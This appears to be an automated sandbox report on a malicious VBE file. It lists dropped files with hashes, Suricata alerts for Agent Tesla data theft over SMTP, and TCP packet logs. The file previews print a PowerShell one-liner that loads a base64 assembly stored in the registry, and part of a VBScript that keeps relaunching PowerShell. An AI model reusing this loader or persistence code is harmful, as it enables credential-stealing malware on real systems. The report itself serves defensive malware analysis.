                                                    SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                                                    MD5:ED30A738A05A68D6AB27771BD846A7AA
                                                    SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                                                    SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                                                    SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                                                    Malicious:false
                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):3256
                                                    Entropy (8bit):5.404109340363203
                                                    Encrypted:false
                                                    SSDEEP:96:gEzlHyIFKL2O9qrh7Kf+oRJ5Eo9AdrxwN:V1yt2jrAfRLL2G
                                                    MD5:047B195D3B8C00130835658997B1925D
                                                    SHA1:5F77C7A5F798C4C0253839EBD7554B13987704E3
                                                    SHA-256:B2C2801565403B2348CAF820F20B4B92C8725A5079D5360DAF455E84D28AC1FB
                                                    SHA-512:D1724BE394B214B914A236AC1D55DB17B93669880BB3F71057DCD070AF3062FBFF494ABE085345015FCDF5FE6B11BAE9A19FCD20DC4EB749E13F31CD5565D60D
                                                    Malicious:false
                                                    Preview:@...e...........................................................H..............@-....f.J.|.7h8..q.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_235jdk02.czy.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_foglbfhy.ktv.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):252
                                                    Entropy (8bit):5.461689719340332
                                                    Encrypted:false
                                                    SSDEEP:6:xVwe5ljxsu2xKbLtSXqo83mWngzsHg4HXZuBiA2V0LYC7zsHgB2eFI59:772EtSXqd27zmg4HJci1V0LYIzmg0eo
                                                    MD5:C7CDD3174DC32767F2CC2DF349ECA42D
                                                    SHA1:12F4B14FAD7684BDEA591434D442B6E08090BA81
                                                    SHA-256:5CE8777F785CD74A693EEA29A30284D5EF2C8C1EB7C8343BC211F6821DBA0862
                                                    SHA-512:FC15820CCD44797983B213C6B57CC8AC19491BCE94BDB0D44637287D5C9878445B98B542AC7F3EA4646C6FA5609AC99EBE72BA5FCD5F88F68D1433EAA722B3CF
                                                    Malicious:false
                                                    Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\bEvujIIdkyIbOgF' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('bEvujIIdkyIbOgF')..Stop-Process -Name conhost -Force..

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.7113587394857896
                                                    Encrypted:false
                                                    SSDEEP:96:ZOG/IlcMlplfCKlcoQykvhkvCCtB1/LVT+HO1/LVI+HH:ZOGAqMPNiMB1/J1/x
                                                    MD5:6403DB26A881DF1E40891C0B4400C843
                                                    SHA1:ACA630130FDB2F10942624F62E816B76E9CC9AAC
                                                    SHA-256:FEDEC3E4237E4CD2DF15D7432BB238FE718467FCAC5DCD89FF08875DF569505A
                                                    SHA-512:58458F791961E1EE99AB79D5BB398320DAE0DF72D6CB7FC6B0ACD51F27596E1CA98B29DA91AED084E234AA90AF040FD3A8163DCFFD6E6AA47D7BFF9227E947DF
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d.........g..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....qs`.g.....g......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl/Zj.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1...../Zm...Roaming.@......DWSl/Zm.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl/Zf.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW!r..Windows.@......DWSl/Zf.....E.....................i.A.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl/Zf.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl/Zf.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl/Zm.....q...........

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\77SO8JQ65TB924MXZW6G.temp

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6222
                                                    Entropy (8bit):3.7113587394857896
                                                    Encrypted:false
                                                    SSDEEP:96:ZOG/IlcMlplfCKlcoQykvhkvCCtB1/LVT+HO1/LVI+HH:ZOGAqMPNiMB1/J1/x
                                                    MD5:6403DB26A881DF1E40891C0B4400C843
                                                    SHA1:ACA630130FDB2F10942624F62E816B76E9CC9AAC
                                                    SHA-256:FEDEC3E4237E4CD2DF15D7432BB238FE718467FCAC5DCD89FF08875DF569505A
                                                    SHA-512:58458F791961E1EE99AB79D5BB398320DAE0DF72D6CB7FC6B0ACD51F27596E1CA98B29DA91AED084E234AA90AF040FD3A8163DCFFD6E6AA47D7BFF9227E947DF
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ...d.........g..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....qs`.g.....g......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl/Zj.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1...../Zm...Roaming.@......DWSl/Zm.....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl/Zf.....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW!r..Windows.@......DWSl/Zf.....E.....................i.A.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl/Zf.....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl/Zf.....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl/Zm.....q...........

                                                    C:\Users\user\AppData\Roaming\bEvujIIdkyIbOgF.vbs

                                                    Download File
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):2915
                                                    Entropy (8bit):5.0505975283730935
                                                    Encrypted:false
                                                    SSDEEP:48:lnJrvgJXVv0qD4p7pYazwHYMH9KHaANMaBoqpotJ8gfng++E/uTcb6OqaBXl8zma:lJL4VvlDQepHXH4HaDaK8gPOOqav97ZS
                                                    MD5:DDF1E2F5DE2CE71CCF56AF38DEDB27D0
                                                    SHA1:0033A0EB6BABB97203CB8BB7F68287CFAC9D96DC
                                                    SHA-256:0A988536FC481BD16AF5469D5FAA1BBB9DC321601DFA858479C01844A3CDD1C8
                                                    SHA-512:F4E451051D3BF74FAF142973EF1F2A8C008D654F6D7178DBC426DCEEE2F16FB88C90980E3E12E77B3499D9F7A0BC4F36FAAFAD35FB52BB9C8F8BA03AE2585941
                                                    Malicious:true
                                                    Preview:Option Explicit..' Nombre du projet: bEvujIIdkyIbOgF.' Variables globales.Dim ShellObjet, DossierWindows, CompteurIterations.Set ShellObjet = CreateObject("WScript.Shell").DossierWindows = ShellObjet.ExpandEnvironmentStrings("%windir%")..' Programme principal.Call Initialisation().Call ExecutionPrincipale()..' Initialisation des parametres du programme.Sub Initialisation(). CompteurIterations = 0.End Sub..' Routine principale pour gerer l'execution du programme.Sub ExecutionPrincipale(). Do While CompteurIterations < 10000 ' Limite d'iterations pour demonstration. Call VerifierEtDemarrerPowerShell(). WScript.Sleep 10000. CompteurIterations = CompteurIterations + 1. Loop.End Sub..' Procedure pour verifier et demarrer PowerShell si necessaire.Sub VerifierEtDemarrerPowerShell(). If Not ProcessEnCours(ShellObjet.RegRead("HKEY_CURRENT_USER\Software\bEvujIIdkyIbOgF\i")) Then. If ShellObjet.RegRead("HKEY_CURRENT_USER\Software\bEvujIIdkyIbOgF\in") = "1"

                                                    \Device\ConDrv

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:Non-ISO extended-ASCII text, with very long lines (875), with CRLF line terminators, with escape sequences
                                                    Category:dropped
                                                    Size (bytes):1445
                                                    Entropy (8bit):4.464907235348319
                                                    Encrypted:false
                                                    SSDEEP:24:Ei/vNa2V269+Iz2HUdSjeKm3uSmcHsU9MxOAX4WLeX4WgeX4WgeX4WneX4WueX4s:ERWxZz2HUwysU9+OAX+X5XpXKX/XFXoK
                                                    MD5:976A9FDC8F52DAD9B9A03DFECA170F68
                                                    SHA1:EC3FB14B0167F56439E3D8055DD19C58141AD1DD
                                                    SHA-256:464B9C4450203483760D4189FAFDC35419AF00C5AE3126DA3BFA19E873CD7F0F
                                                    SHA-512:CB8AC704F8CDA1F178F44A4A4310F0F369FC07E2896290A1FA80155DDD175CAE5AD65BA3BED6AE72A2D31F85FF6A30516B8A7913B1FFA5F5073EE3FB960A72CF
                                                    Malicious:false
                                                    Preview:.[91m> .[0m.[93m[.[33m.[45m.[0m.[33m.[45m> .[0m.[33m[.[37mAppDomain.[33m]::.[97mCurrentDomain.[33m..[97mLoad.[33m([.[37mConvert.[33m]::.[97mFromBase64String.[33m((.[90m-join.[33m.[45m .[33m(.[93mGet-ItemProperty.[33m.[45m .[90m-LiteralPath.[33m.[45m .[36m'HKCU:\Software\bEvujIIdkyIbOgF'.[33m.[45m .[90m-Name.[33m.[45m .[36m's'.[33m)..[97ms.[33m.[45m .[33m|.[33m.[45m .[93mForEach-Object.[33m.[45m .[33m{.[92m$_.[33m[.[97m-1.[90m..-.[33m(.[92m$_.[33m..[97mLength.[33m)]})));.[33m.[45m .[33m[.[37mb.b.[33m]::.[97mb.[33m(.[36m'bEvujIIdkyIbOgF'.[33m).[0m.tape 1 ..etape 2...[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconho.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhos.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m .[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[90m-Name.[33m.[45m .[33mconhost.[33m.[45m .[90m-.[33m.[45m.[0m.[93mStop-Process.[33m.[45m .[

                                                    Static File Info

                                                    General

                                                    File type:data
                                                    Entropy (8bit):3.9908336623105405
                                                    TrID:
                                                    • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                    • MP3 audio (1001/1) 32.22%
                                                    • Lumena CEL bitmap (63/63) 2.03%
                                                    • Corel Photo Paint (41/41) 1.32%
                                                    File name:009.vbe
                                                    File size:10'722 bytes
                                                    MD5:9ff77002fbcbdd6e749722541b423034
                                                    SHA1:ea5ff219e2dde3cc57a1668ff0526be5b84e1250
                                                    SHA256:5b3b169b48056c1cd8b84093c312de2f9ec1c7a1edcd7591743f6eac62c98ab9
                                                    SHA512:609f25739f34355e0e37fd244cd743f3442be6cb2518ff9fa0ec58ec5ec103e730d5f005ca86c040a7b3a078d49dd6b2363659085eaecc2de2fd24159da13388
                                                    SSDEEP:192:meHNd/sigyXaoMutGV+GCCYSyC+QvdyNhnKxtKlK:5HMiTDV+xnYSH+QVyNhnctKM
                                                    TLSH:F522EA58DFDD44C0F7216B864BC9D7629B1F6A245B0F4AC20D61428B373ED80ADA9F39
                                                    File Content Preview:..#.@.~.^.1.x.Q.A.A.A.=.=.v.,.'.x.{.P.j.....D.k.6.k.1.C.Y.b.W.U./.,./.z.d.D.....:.+.,.x.'.{.@.#.@.&.w.;.U.m.D.k.K.x.~.|.P.K.I.`.b.@.#.@.&.~.P.,.P.6.U.,.2.D...G.M.P.].+.k.;.s.+.~.g.+.X.Y.@.#.@.&.P.,.~.P.G.k.h.P.o.A.J.K.B.P.p.\...I.B.P.K.t.].F.@.#.@.&.P.,.P

                                                    File Icon

                                                    Icon Hash:68d69b8f86ab9a86

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2025-01-15T21:27:36.637872+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.549709162.254.34.31587TCP
                                                    2025-01-15T21:27:36.637872+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549709162.254.34.31587TCP
                                                    2025-01-15T21:29:15.100589+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.549709162.254.34.31587TCP
                                                    2025-01-15T21:29:15.100589+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.549709162.254.34.31587TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 15, 2025 21:27:21.318677902 CET49674443192.168.2.523.1.237.91
                                                    Jan 15, 2025 21:27:21.318677902 CET49675443192.168.2.523.1.237.91
                                                    Jan 15, 2025 21:27:21.443718910 CET49673443192.168.2.523.1.237.91
                                                    Jan 15, 2025 21:27:24.078821898 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.128331900 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.128416061 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.128643036 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.133459091 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.750247002 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.750298023 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.750334978 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.750368118 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.750376940 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.750401974 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.750435114 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.750437021 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.750468969 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.750494957 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.750502110 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.750535965 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.750549078 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.750570059 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.750608921 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.755580902 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.755615950 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.755666971 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.840816975 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.840919018 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.841018915 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.841044903 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.841053963 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.841108084 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.841144085 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.841196060 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.841228962 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.841254950 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.841279030 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.841311932 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.841351986 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.841943026 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.841991901 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.841995955 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:24.896747112 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.924185991 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:24.929239035 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.112163067 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.117398024 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.122330904 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.301640034 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.301666975 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.301686049 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.301691055 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.301696062 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.301759958 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.301820040 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.301980972 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.301992893 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.302020073 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.302298069 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.302309036 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.302321911 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.302331924 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.302335024 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.302347898 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.302942991 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.302953959 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.302964926 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.303002119 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.303014040 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.303024054 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.303060055 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.303858042 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.303869009 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.303880930 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.303894043 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.303904057 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.303905964 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.303924084 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.304770947 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.304781914 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.304802895 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.304809093 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.304820061 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.304820061 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.304860115 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.305648088 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.305659056 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.305700064 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.305721045 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.305743933 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.305754900 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.305773020 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.306535006 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.306562901 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.306575060 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.349891901 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.386248112 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.391339064 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.569441080 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.600626945 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.605492115 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.784152031 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.784200907 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.784236908 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.784270048 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.784298897 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.784326077 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.784332991 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.784368992 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.784425974 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:25.784440994 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.820831060 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:25.825716019 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.016869068 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.016937971 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.016973972 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017005920 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017015934 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.017040968 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017055988 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.017074108 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017118931 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.017153025 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017204046 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017250061 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.017256975 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017288923 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017322063 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017333031 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.017354012 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017386913 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017393112 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.017419100 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017452002 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017463923 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.017484903 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017529964 CET4970680192.168.2.5144.91.79.54
                                                    Jan 15, 2025 21:27:26.017537117 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.017992020 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.018027067 CET8049706144.91.79.54192.168.2.5
                                                    Jan 15, 2025 21:27:26.018043041 CET4970680192.168.2.5144.91.79.54
